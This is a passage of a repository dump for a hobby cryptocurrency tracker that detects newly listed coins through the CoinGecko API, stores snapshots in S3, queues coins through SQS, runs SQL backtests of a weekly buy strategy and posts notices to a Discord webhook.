date\n2. Loads yesterday's market list snapshop based on execution date\n3. Compares the 2 sets of data, looking for new coins which were not in Yesterday's list\n4. Adds today's timestamp into the payload\n5. Writes the output of entries into a 'watch' list bucket `<bucket>/watchlist/2021-11-11-newcoins.json`\n4. return success or failure\n\n\n## Job 3 - Pull Today's Details for watched coins\n\nThis job will pull the market price and other details like volume etc for a specific coin and for each \n\n\n\n--------\n\n## Setting up for lambda deployment\n\nrun `pip install -r requirements.txt --target ./package` to install all required packages listed in the requirements.txt to a local directory. This helps us deploy a zip\n\n\n\n\n## setting up for local deployment\n\nhere's the env file you should make (.env in your root)\n```\nBUCKET = \"coin-analysis-data-ar-staging\"\nSNAPSHOT_PATH = \"snapshots\"\nSNAPSHOT_FILENAME = \"snapshot.json\"\n\nWATCHLIST_PATH = \"watchlist\"\nWATCHLIST_FILENAME = \"watchlist.json\"\n\nCOINS_PATH = \"coins\"\nCOINS_FILENAME = \"watchlist.json\"\n\n\nQUERY_LOGIC_VOLUME = 1300000\nQUERY_LOGIC_PRICE = 0.003\n\nATHENA_DATABASE = \"coin_analysis\"\nATHENA_WATCHLIST_TABLE = \"watchlist\"\nATHENA_MARKETDETAILS_TABLE = \"marketdetails\"\n\nDISCORD_BOT_WEBHOOK = \"<hook here>\n\n```" }, { "alpha_fraction": 0.64449542760849, "alphanum_fraction": 0.6530963182449341, "avg_line_length": 18.795454025268555, "blob_id": "a53650a136dbdb2c5ce0f1ab815ba8498ea75c94", "content_id": "76b59303ad6da6659dbe54451ff86b6050f2deb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 141, "num_lines": 88, "path": "/src/sql/7day_coin_data_with_average.sql", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\n\n/*\n7 day market volume average for new coins.\nThis is used as a source table for another query - \n\nIncludes:\n- Date of the 1st Day\n- Date of the 7th Day\n- 7 day volume average \n- Coin symbol\n\nputs this into a new table called '7day_coins_wdate'\n*/ \n\n\nwith simpletable as (\n\nselect \n\n\nucdcc.\"Date\",\nucdcc.symbol,\n--avg(ucdcc.volume) as volume_avg_day_7,\nucdcc.volume,\n--ucdcc.price\n\nfirst_value (ucdcc.\"price\") \nOVER(\n PARTITION BY ucdcc.\"symbol\"\n ORDER BY ucdcc.\"Date\" desc\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) price_at_day7,\n\nfirst_value (ucdcc.\"Date\") \nOVER(\n PARTITION BY ucdcc.\"symbol\"\n ORDER BY ucdcc.\"Date\" desc\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) date_at_day7\n\nfrom public.updated_crypto_data_coingecko_csv ucdcc \n\ninner join (\n\nselect \n\nsymbol,\nfirst_value (\"Date\") \n OVER(\n PARTITION BY \"symbol\"\n ORDER BY \"Date\"\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) first_day,\nfirst_value (\"Date\") \n OVER(\n PARTITION BY \"symbol\"\n ORDER BY \"Date\"\n RANGE BETWEEN \n UNBOUNDED PRECEDING AND \n UNBOUNDED FOLLOWING\n ) + interval '7 day' last_day\n\nfrom public.updated_crypto_data_coingecko_csv ucdcc2 \n\n \n ) windows on windows.symbol = ucdcc.symbol and ucdcc.\"Date\" >= windows.first_day::TIMESTAMP and ucdcc.\"Date\" <= windows.last_day::TIMESTAMP\n \n-- group by ucdcc.symbol, ucdcc.volume, ucdcc.price, ucdcc.\"Date\"\n \n)\n\nselect \n\nsymbol,\navg(volume) as average_volume,\nprice_at_day7,\ndate_at_day7\n\nINTO public.\"7day_coins_wdate\"\nfrom simpletable\ngroup by symbol, price_at_day7, date_at_day7\n\n;\n" }, { "alpha_fraction": 0.7655677795410156, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 21.83333396911621, "blob_id": "077c94d71e5f7624fcbd4a59ebef69e6c9d7f3eb", "content_id": "7f4a975c9b0a199508ed9039a6a94f340883236b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 273, "license_type": "no_license", "max_line_length": 75, "num_lines": 12, "path": "/ec2_dailyupdate.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nscript for the ec2 instance to run daily updates and do its notifcation etc\nrun this on a cron\n\"\"\"\n\nimport lambda_function\nfrom src import daily_check\n\nlambda_function.lambda_handler(\"daily\",\"\")\ndaily_check.orchestrate_daily_coin_check()\n\nprint(\"finished daily update\")" }, { "alpha_fraction": 0.5991329550743103, "alphanum_fraction": 0.6083815097808838, "avg_line_length": 25.929960250854492, "blob_id": "636de803a876c98cbeefe60bfa9c0bc7e91cd1b0", "content_id": "0bb2491594b7eae2055bfe9fe5a5700dc85222fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6920, "license_type": "no_license", "max_line_length": 181, "num_lines": 257, "path": "/src/coin_getter/cgutils.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nShared utilities\n\"\"\"\n\nimport arrow, json, time\nimport re, os\nimport boto3\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef datetime_now():\n \"\"\"\n returns UTC now time\n add .format('YYYY-MM-DD HH:mm:ss ZZ') to convert to ISO\n add .format()\n \"\"\"\n return arrow.utcnow()\n\ndef startofday_epohc_now():\n \"\"\"\n give the epoch of the time at 00:00 hrs in epoch\n \"\"\"\n now_date = arrow.utcnow().format(\"YYYY-MM-DD\")\n now_epoch = arrow.get(now_date).format(\"X\")\n now_epoch = re.sub(r\"\\.0\",\"000\",now_epoch)\n \n return now_epoch\n\ndef partition_path_from_date(input_date):\n \"\"\"\n returns path for s3 partitioning from date:\n eg.\n `2021-11-27 00:00:00`\n becomes: \n `year=2021/month=11/day=27`\n \"\"\"\n date_value = arrow.get(input_date) #expects timestamp\n year = date_value.year\n month = date_value.month\n day = date_value.day\n\n return f\"year={year}/month={month}/day={day}\"\n\n\ndef epoch_to_timestamp(epoch_string):\n \"\"\"\n converts data from epoch to athena friendly timestamp\n \"\"\"\n \n epoch_string_clean = str(int(epoch_string/1000) ) #remove milliseconds\n try:\n formatted_timestamp = arrow.get(epoch_string_clean,\"X\").format(\"YYYY-MM-DD HH:mm:ss\")\n except:\n formatted_timestamp = datetime_now().format(\"YYYY-MM-DD HH:mm:ss\")\n return formatted_timestamp\n\n\ndef dict_to_jsonl(dict_input):\n \"\"\"\n takes a dict object and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = json.dumps(dict_input)\n jsonl_contents = re.sub(f\"\\n\",\"\",jsonl_contents)\n return jsonl_contents\n\n\ndef list_of_dicts_to_jsonl(list_input):\n \"\"\"\n takes a list of dict objects and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = \"\"\n for each_entry in list_input:\n jsonl_contents = jsonl_contents + \"\\n\" + json.dumps(each_entry)\n\n \n return jsonl_contents\n\n\ndef write_to_storage(data, bucket, filename_path):\n \"\"\"\"\n will write data to a storage location\n \"\"\"\n\n client = boto3.client('s3')\n return client.put_object(Body=data, Bucket=bucket, Key=filename_path)\n \ndef read_from_storage(bucket, filename_path):\n \"\"\"\n will read data from a storage location *s3\n \"\"\"\n client = boto3.client('s3')\n response = client.get_object(\n Bucket=bucket,\n Key=filename_path,\n )\n return response\n\ndef notify_discord_bot(text_string):\n \"\"\"\n notifies the discord webhook\n \"\"\"\n DISCORD_BOT_WEBHOOK = os.getenv('DISCORD_BOT_WEBHOOK')\n\n list_of_messages = split_string_discord(text_string)\n\n for each_message in list_of_messages:\n time.sleep(.5)\n data = {\n \"content\": str(each_message)\n }\n response = requests.post(url=DISCORD_BOT_WEBHOOK, json=data)\n print(response)\n \n print(f\"notification complete\")\n\n\ndef split_string_discord(input_string,character_limit=1500):\n \"\"\"\n splits a string into chunks for discord notifications\n \"\"\"\n chunks = input_string.split('\\n')\n \n print(chunks)\n\n messages = []\n chunk_string = \"\"\n for each_item in chunks:\n old_chunkstring = chunk_string\n new_chunk_string = f\"{chunk_string}\\n{each_item}\"\n if len(new_chunk_string) > character_limit:\n messages.append(old_chunkstring)\n chunk_string = each_item\n else:\n chunk_string = new_chunk_string \n if each_item == chunks[-1]:\n print(\"last message\")\n messages.append(chunk_string)\n \n return messages\n\ndef send_to_sqs(coin_id):\n \"\"\"\n send a message to the sqs queue specified by the environment variable\n \"\"\"\n # Create SQS client\n sqs = boto3.client('sqs')\n\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n # Send message to SQS queue\n response = sqs.send_message(\n QueueUrl=SQS_QUEUE_URL,\n # DelaySeconds=1,\n MessageGroupId=\"coin-getter\",\n MessageDeduplicationId=str(coin_id),\n MessageAttributes={\n 'coin_id': {\n 'DataType': 'String',\n 'StringValue': str(coin_id)\n }\n },\n MessageBody=(\n 'Sent for coin analysis'\n )\n )\n\n print(response['MessageId'])\n\n\ndef read_sqs_message(sqs_payload, key_to_find=\"coin_id\", delivery_method=\"push\"):\n \"\"\"\n will read sqs messages and return the body message \n There are multiple ways to parse messages from sqs, so we need to be aware of the deliverymethod\n delivery_method:\n \"pull\" - we're pulling from the queue\n \"push\" - we're being pushed the data via like a lambda trigger\n \"\"\"\n \n if delivery_method == \"push\":\n data = sqs_payload[\"Records\"][0][\"messageAttributes\"][key_to_find][\"stringValue\"]\n elif delivery_method == \"pull\":\n data = sqs_payload[\"Messages\"][0][\"MessageAttributes\"][key_to_find][\"StringValue\"]\n else:\n raise Exception(f\"Unable to read data from sqs - delivery method {delivery_method} not supported\")\n\n # [\"MessageAttributes\"][key_to_find][\"Value\"]\n # key_we_need = body[\"MessageAttributes\"][key_to_find][\"Value\"]\n return data\n\ndef delete_message_from_queue(ReceiptHandle):\n \"\"\"\n will delete a message from the sqs queue\n response = client.delete_message(\n QueueUrl='string',\n ReceiptHandle='string'\n )\n \"\"\"\n sqs = boto3.client('sqs')\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n response = sqs.delete_message(\n QueueUrl=SQS_QUEUE_URL,\n ReceiptHandle=ReceiptHandle\n )\n return response\n\ndef read_from_sqs_queue():\n \"\"\"\n will read a message from the sqs queue\n apparently this can be unreliable, so we should try mulitple times. \n eg. 5 times\n \"\"\"\n sqs = boto3.client('sqs')\n\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n retries = 0\n retries_max = 5\n data_found = False\n attempt_id = f\"{arrow.utcnow().format('X')}-getcoin\"\n data_from_message = None\n while retries < retries_max and data_found == False:\n response = sqs.receive_message(\n QueueUrl=SQS_QUEUE_URL,\n AttributeNames=[\n \n ],\n MessageAttributeNames=[\n 'coin_id',\n ],\n MaxNumberOfMessages=1,\n VisibilityTimeout=123,\n WaitTimeSeconds=10,\n ReceiveRequestAttemptId=attempt_id\n )\n try:\n data_from_message = read_sqs_message(sqs_payload=response, key_to_find=\"coin_id\", delivery_method=\"pull\") #[\"Messages\"][0][\"MessageAttributes\"][\"coin_id\"][\"StringValue\"]\n data_found = True\n print(f\"FOUND {data_from_message}\")\n except:\n print(\"did not find\")\n retries = retries + 1\n\n\n return data_from_message\n\n\n # except Exception as e:\n # print(f\"unable to parse {key_to_find} from sqs message: {sqs_payload} \")\n # exit()\n\n\n# send_to_sqs('adam')\n# read_from_sqs_queue()" }, { "alpha_fraction": 0.7446808218955994, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 14.833333015441895, "blob_id": "f79e2d22a7d1f0ce8d276c09a2598c9368f9b741", "content_id": "af8890e59400615b2e410180b1409fe8ca5a3da0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 42, "num_lines": 6, "path": "/daily.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nfor daily runs\n\"\"\"\nfrom src import daily_check\n\ndaily_check.orchestrate_daily_coin_check()" }, { "alpha_fraction": 0.7396694421768188, "alphanum_fraction": 0.7520661354064941, "avg_line_length": 17.69230842590332, "blob_id": "51a5a1f01a032cc9dc80c5658dc179d9d343d948", "content_id": "54e6acdfd8c7880223801323869e4b5b4f62201d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 242, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/ec2/install_script.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#in /home/ec2-user/\n\nsudo yum update -y\nsudo yum install git -y\n\ncd /home/ec2-user/\ngit clone https://github.com/AdamRuddGH/crypto_newcoins_tracker.git \ncd crypto_newcoins_tracker\npip3 install -r requirements.txt\n\n./setup_cron.sh" }, { "alpha_fraction": 0.6764705777168274, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 10.333333015441895, "blob_id": "52df864e273d4ad2cf52d203e3d32e2cce08af5c", "content_id": "581160575a4e97b85dea5c529526409c23be8904", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 34, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/ec2/setup_cron.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#sets up the cronjob\n" }, { "alpha_fraction": 0.6323046684265137, "alphanum_fraction": 0.6605384349822998, "avg_line_length": 23.95081901550293, "blob_id": "1a312177ea345eecde0708cd220ca0985a899831", "content_id": "dfbdffbd156ce034b6af0636480ebbb345682d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 126, "num_lines": 61, "path": "/src/sql/Weekly_buy_strategy.sql", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\n\n/*\nWeekly Buy strategy: \n- Once a coin has 7 days of volume available, we put it into consideration for a purchase at the end of the week(eg. Saturday)\n- We select coin with the highest volume coin for that week\n- We buy that coin\n*/\n\n\nwith report as (\n with calc_weekbuy as(\n with base_table as (\n select *,\n extract(week from cast(date_at_day7 as date)) as week_num,\n extract(year from cast(date_at_day7 as date)) as year_num,\n to_date(to_char(date_at_day7, 'IYYY-IW'),'iyyy-iw') + interval '6 day' as year_week\n\n from \"7day_coins_wdate\" dcw \n where date_at_day7 > CAST('2020-01-01' as date)\n )\n\n select \n distinct\n\n (FIRST_VALUE ( symbol ) OVER ( partition by year_week ORDER BY price_at_day7 desc ) ) as week_winner,\n year_week\n\n from base_table \n order by year_week asc \n )\n\nselect \ndistinct\n* \n\nfrom \ncalc_weekbuy\n\ninner join (\n\nselect \nsymbol,\n\"Date\",\nprice,\n(FIRST_VALUE ( \"price\" ) OVER ( partition by \"symbol\" ORDER BY \"Date\" desc ) ) as latest_price,\n(FIRST_VALUE ( \"price\" ) OVER ( partition by \"symbol\" ORDER BY \"Date\" desc ) - price) / price +1 as price_change_perc\n\nfrom public.updated_crypto_data_coingecko_csv ucdcc \nwhere price >0\n) j on j.symbol = calc_weekbuy.week_winner and j.\"Date\" = calc_weekbuy.year_week\n\norder by \"Date\" asc) -- 100185.74394816707%\n\n\nselect sum(price_change_perc) as gainz,\n count(1) as count_of_payments,\n 420*count(1) as \"cost\",\n sum(price_change_perc)*120 as \"money_gains\"\n\n\nfrom report\n;" }, { "alpha_fraction": 0.5979381203651428, "alphanum_fraction": 0.7525773048400879, "avg_line_length": 15.333333015441895, "blob_id": "e4f89108184b7797fa489aff51e2e76e5337e777", "content_id": "6ef1a1e31777aa131435326ed2bd3e52055551a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 97, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/requirements.txt", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "pycoingecko==2.2.0\narrow\nsuper-json-normalize==0.1.0\nboto3==1.19.7\npython-dotenv==0.19.1\nrequests" }, { "alpha_fraction": 0.6544222831726074, "alphanum_fraction": 0.6576319336891174, "avg_line_length": 29.824174880981445, "blob_id": "7375a85ebe75ce6fc874d0f39ee33064951631cd", "content_id": "7e55473e509ad721239d3faaf433a6daefae62d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2804, "license_type": "no_license", "max_line_length": 99, "num_lines": 91, "path": "/src/compareyesterday.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\ncompares yesterday's markets with today. Creates a series of coins to listen to based in the delta\n\"\"\"\nimport arrow\nfrom . import utils\nimport os \n\nimport json\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\n\ndef read_snapshot_from_date(supplied_date):\n \"\"\"\n loads the snapshot from s3 based on current date\n expects an arrow datetime object, but if it doesn't exist it'll pull today's date from datetime\n \"\"\"\n BUCKET = os.getenv('BUCKET')\n SNAPSHOT_PATH = os.getenv('SNAPSHOT_PATH')\n SNAPSHOT_FILENAME = os.getenv('SNAPSHOT_FILENAME')\n \n year = supplied_date.year\n month = supplied_date.month\n day = supplied_date.day\n\n snapshot_path = f\"{SNAPSHOT_PATH}/year={year}/month={month}/day={day}/{SNAPSHOT_FILENAME}\"\n\n s3_file = utils.read_from_storage(bucket = BUCKET, filename_path=snapshot_path)\n s3_file_data = json.loads(s3_file['Body'].read())\n \n return s3_file_data\n\n\n\ndef compare_yesterday_and_today():\n \"\"\"\n orchestrates the comparison of date between dates\n returns the delta as a list with the watchlist snapshot date in each object within\n results will end up int he watchlist path within the specified bucket\n \"\"\"\n\n today = utils.datetime_now()\n yesterday = utils.datetime_now().shift(days=-1)\n\n today_data = read_snapshot_from_date(today)\n yesterday_data = read_snapshot_from_date(yesterday)\n delta = []\n\n #iterate through all coins in list and look for new ones\n for each_coin in today_data[\"data\"]:\n match = False\n for each_coin_yesterday in yesterday_data[\"data\"]:\n if each_coin[\"id\"] == each_coin_yesterday[\"id\"]:\n match = True\n if match == False:\n each_coin[\"added_date\"] = today_data[\"date\"]\n delta.append(each_coin)\n\n if len(delta) > 0:\n # print(f\"found coins: {delta}\")\n clean_names = []\n for each in delta:\n clean_names.append(each[\"name\"])\n status = write_delta_to_watch_location(delta_list=delta, date_value=today)\n return clean_names\n else:\n return [\"No new coins today\"]\n\n\ndef write_delta_to_watch_location(delta_list,date_value):\n \"\"\"\n will take a list (ideally with the deltas from 2 dates) and will write to watch location (s3)\n \"\"\"\n\n BUCKET = os.getenv('BUCKET')\n SNAPSHOT_PATH = os.getenv('WATCHLIST_PATH')\n SNAPSHOT_FILENAME = f\"{os.getenv('WATCHLIST_FILENAME')}\"\n\n year = date_value.year\n month = date_value.month\n day = date_value.day\n\n path = f\"{SNAPSHOT_PATH}/year={year}/month={month}/day={day}/{SNAPSHOT_FILENAME}\"\n\n delta_jsonl = utils.list_of_dicts_to_jsonl(delta_list)\n status = utils.write_to_storage(data=delta_jsonl, bucket=BUCKET, filename_path=path)\n\n return status\n\n# print( compare_yesterday_and_today() )" }, { "alpha_fraction": 0.6063545346260071, "alphanum_fraction": 0.6116968989372253, "avg_line_length": 30.065502166748047, "blob_id": "7cc98251b26338a6c387d060565adc14b0313233", "content_id": "124b609979400a453cc2907e80fbb88174db143a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7115, "license_type": "no_license", "max_line_length": 136, "num_lines": 229, "path": "/adhoc_scripts/historical_load.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nwill get all historic data for all coins as a single jsonld\nuses coingecko api\n\nstandalone script\n\n\"\"\"\n\nfrom pycoingecko import CoinGeckoAPI\nfrom requests.models import HTTPError\nimport json, time, os, arrow, datetime\nimport boto3\nimport requests\nimport gzip\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef get_coins_details(coin_id ):\n \"\"\"\n endpoint for getting data for coins details\n pulled out into its own component so we can easily replace \n end_date is required. this allows us to cap the report in days\n \"\"\"\n print(f\"getting coin details for: {coin_id}\")\n cg = CoinGeckoAPI()\n\n max_retries = 10\n retry_number = 0\n wait = 61\n success = False\n time.sleep(1.1)\n coin_details = None\n while success == False and retry_number < max_retries:\n try:\n coin_details = cg.get_coin_market_chart_by_id(id=coin_id,vs_currency=\"aud\", days=\"max\", interval=\"daily\") #get the 24 hour \n success = True\n except HTTPError as e:\n if e.response.status_code == 429:\n retry_number = retry_number + 1\n print(f\"too many requests error. Waiting {wait} seconds\")\n time.sleep(wait) #wait for this to ease up by waiting for a minute\n else:\n break\n except Exception:\n notify_discord_bot(f\"error with getting coin marketing chart by id for coin: {coin_id}. Skipping\")\n break\n \n if coin_details:\n historic_coin_details_list = extract_historical_market_value_for_coins(coin_details,coin_id=coin_id, days=\"max\")\n\n return historic_coin_details_list\n else:\n return []\n\n\ndef extract_historical_market_value_for_coins(coin_details,coin_id,days):\n\n print(\"extract_historical_market_value_for_coins()\")\n end_entry = -1 #the entry which isn't the time at the call - looks like range uses the last item the same as a < symbol. \n coins_to_get_startingpoint = 0\n coin_history = []\n\n #apply the indexing based on start and end\n coin_index = []\n try:\n # print(coin_details[\"prices\"][coins_to_get_startingpoint:end_entry])\n for eachindex in coin_details[\"prices\"][coins_to_get_startingpoint:end_entry]:\n coin_index.append(coin_details[\"prices\"].index(eachindex))\n\n age = 0\n for each_entry in coin_index:\n coin_data = {\n \"id\": coin_id,\n \"date\": epoch_to_timestamp(coin_details[\"prices\"][each_entry][0]), #was -1 for latest. lets just get the minight volume\n \"prices\": coin_details[\"prices\"][each_entry][-1],\n \"market_caps\": coin_details[\"market_caps\"][each_entry][-1],\n \"total_volumes\": coin_details[\"total_volumes\"][each_entry][-1],\n \"age\": age\n }\n age = age + 1\n coin_history.append(coin_data)\n except:\n notify_discord_bot(f\"error with extracting historical market value for coins {coin_id}. Skipping\")\n pass\n\n return coin_history\n \n\n\ndef epoch_to_timestamp(epoch_string):\n \"\"\"\n converts data from epoch to athena friendly timestamp\n \"\"\"\n \n epoch_string_clean = str(int(epoch_string/1000) ) #remove milliseconds\n try:\n formatted_timestamp = arrow.get(epoch_string_clean,\"X\").format(\"YYYY-MM-DD HH:mm:ss\")\n except:\n formatted_timestamp = datetime_now().format(\"YYYY-MM-DD HH:mm:ss\")\n return formatted_timestamp\n\ndef get_coins_list():\n \"\"\"\n endpoint for getting data for coins list\n pulled out into its own component so we can easily replace \n \"\"\"\n cg = CoinGeckoAPI()\n return cg.get_coins_list()\n\ndef compress(input_data):\n \"\"\"\n gzip compression for data\n \"\"\"\n gzip_object = gzip.compress(str.encode(input_data) )\n return gzip_object\n\ndef orchestrate_historic_data_extraction():\n \n try:\n coin_list = get_coins_list()\n # coin_list = [{\"id\":\"0-5x-long-cosmos-token\"}]\n\n historic_data = []\n for each_coin in coin_list:\n if len(each_coin[\"id\"]) > 0:\n coin_id = each_coin[\"id\"]\n historic_data.extend(get_coins_details(coin_id=coin_id))\n print(\"✅\")\n \n ldjson = list_of_dicts_to_jsonl(historic_data)\n\n BUCKET = os.getenv('BUCKET')\n COINS_PATH = os.getenv('COINS_PATH')\n path = f\"{COINS_PATH}/historic_load.json.gz\"\n\n print(f\"bucket: {BUCKET}, path: {path}\")\n\n gzip_file = compress(ldjson)\n # write_file(input_string_data=ldjson,filepath=\"./historic_data.json\")\n write_to_storage(data=gzip_file,bucket=BUCKET,filename_path=path)\n notify_discord_bot(f\"initial load of all coins complete. written to {path}\")\n except Exception as e:\n notify_discord_bot(f\"Error with historic load - {e}\")\n\ndef notify_discord_bot(text_string):\n \"\"\"\n notifies the discord webhook\n \"\"\"\n DISCORD_BOT_WEBHOOK = os.getenv('DISCORD_BOT_WEBHOOK')\n\n list_of_messages = split_string_discord(text_string)\n\n for each_message in list_of_messages:\n time.sleep(.5)\n data = {\n \"content\": str(each_message)\n }\n response = requests.post(url=DISCORD_BOT_WEBHOOK, json=data)\n print(response)\n \n print(f\"notification complete\")\n\n\ndef split_string_discord(input_string,character_limit=1500):\n \"\"\"\n splits a string into chunks for discord notifications\n \"\"\"\n \n if len(input_string)<= character_limit:\n return [input_string]\n else:\n chunks = input_string.split('\\n')\n messages = []\n chunk_string = \"\"\n for each_item in chunks:\n\n old_chunkstring = chunk_string\n new_chunk_string = f\"{chunk_string}\\n{each_item}\"\n\n if len(new_chunk_string) > character_limit:\n messages.append(old_chunkstring)\n chunk_string = each_item\n elif each_item == chunks[-1]:\n print(\"last message\")\n messages.append(chunk_string)\n else:\n chunk_string = new_chunk_string \n \n \n return messages\n\ndef list_of_dicts_to_jsonl(list_input):\n \"\"\"\n takes a list of dict objects and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = \"\"\n for each_entry in list_input:\n jsonl_contents = jsonl_contents + \"\\n\" + json.dumps(each_entry)\n \n return jsonl_contents\n\ndef write_file(input_string_data,filepath):\n \"\"\" \n write a file with data\n \"\"\"\n\n with open(filepath,\"w\") as new_file:\n new_file.write(input_string_data)\n\ndef datetime_now():\n \"\"\"\n returns UTC now time\n add .format('YYYY-MM-DD HH:mm:ss ZZ') to convert to ISO\n add .format()\n \"\"\"\n return arrow.utcnow()\n\n# write_file(input_string_data=\"hello\",filepath=\"./hello.json\")\n\ndef write_to_storage(data, bucket, filename_path):\n \"\"\"\"\n will write data to a storage location\n \"\"\"\n print(\"performing putObject\")\n client = boto3.client('s3')\n return client.put_object(Body=data, Bucket=bucket, Key=filename_path)\n\norchestrate_historic_data_extraction()" }, { "alpha_fraction": 0.6740220785140991, "alphanum_fraction": 0.6740220785140991, "avg_line_length": 27.457143783569336, "blob_id": "70231860360aae657f54e763a68e6a30438cc937", "content_id": "668a489578b4d86af5818db09029a873f51c58f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "no_license", "max_line_length": 88, "num_lines": 35, "path": "/src/marketsnapshot.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nWill get a list of all coins in the market at the moment\n\"\"\"\nfrom pycoingecko import CoinGeckoAPI\nfrom . import utils\n\n\ndef get_market_snapshot():\n \"\"\"\n will call an api to get the market snapshot, returning json with a timestamp\n \"\"\"\n date_now = utils.datetime_now()\n market_snapshot = {\"date\": date_now.format('YYYY-MM-DD HH:mm:ss')}\n market_snapshot[\"data\"] = get_coins_list()\n\n year = date_now.year\n month = date_now.month\n day = date_now.day\n\n storagebucket = \"coin-analysis-data-ar-staging\"\n path = f\"snapshots/year={year}/month={month}/day={day}/snapshot.json\"\n data = utils.dict_to_jsonl(market_snapshot)\n\n status = utils.write_to_storage(data=data, bucket=storagebucket, filename_path=path)\n return status\n\ndef get_coins_list():\n \"\"\"\n endpoint for getting data for coins list\n pulled out into its own component so we can easily replace \n \"\"\"\n cg = CoinGeckoAPI()\n return cg.get_coins_list()\n\n# print(get_market_snapshot())\n\n" }, { "alpha_fraction": 0.7521514892578125, "alphanum_fraction": 0.760757327079773, "avg_line_length": 26.714284896850586, "blob_id": "801dd311ac478af85952a62f1a0e89c43edb67bf", "content_id": "2372250fa8fef19ce2bb1562ad7ce70bfb3e19ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 121, "num_lines": 21, "path": "/tests/test_single_coin_check.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\ntest the get and write of a single coin\n\"\"\"\n\nfrom src import getwatchlistdetails\nfrom src.coin_getter import cgutils\nfrom src.coin_getter import get_coins as cg_getcoins\nimport os\n\n\nBUCKET = os.getenv('BUCKET')\n# athena and s3\ngetwatchlistdetails.get_watch_list()\n\n# s3 read\n# s3 write\ncoin_data_raw = cg_getcoins.get_coin(coin_id=\"bitcoin\", days=1) #this is a list\ncoin_data_jsonl = cgutils.list_of_dicts_to_jsonl(coin_data_raw)\ns3write_status = cgutils.write_to_storage(data=coin_data_jsonl, bucket=BUCKET,filename_path=\"testdata/testdata-btc.json\")\n\nprint(\"testing success\")" }, { "alpha_fraction": 0.6256805658340454, "alphanum_fraction": 0.6279491782188416, "avg_line_length": 33.629920959472656, "blob_id": "030d80cf9766628a57160d7886e7b7430452df37", "content_id": "422c27efa3549676c83c3aeb8c84c67a9d138147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4408, "license_type": "no_license", "max_line_length": 145, "num_lines": 127, "path": "/src/daily_check.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\n\"\"\"\ncheck prices for all coins daily, then compress it and upload the single file to s3\n\"\"\"\n\nfrom src import getwatchlistdetails\nfrom src import utils\nfrom src import marketsnapshot\nimport time\nfrom pathlib import Path\nimport os\nimport arrow\nimport gzip\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef join_multiple_data_files_ldjson(input_folder_path,output_path,file_prefix=None):\n \"\"\"\n \n \"\"\"\n import re\n consolidated_dataset = []\n \n output_full_path = f\"{output_path}/{file_prefix}_daily_data.json\"\n\n import os\n import glob\n try:\n list_of_files = (glob.glob(f\"{input_folder_path}/**\")) \n print(len(list_of_files))\n for each in list_of_files:\n with open(each,\"r\") as jsf:\n coin_data = jsf.read()\n coin_data = re.sub(r\"^$\\n\",\"\",coin_data)\n consolidated_dataset.append(coin_data)\n \n output_string = 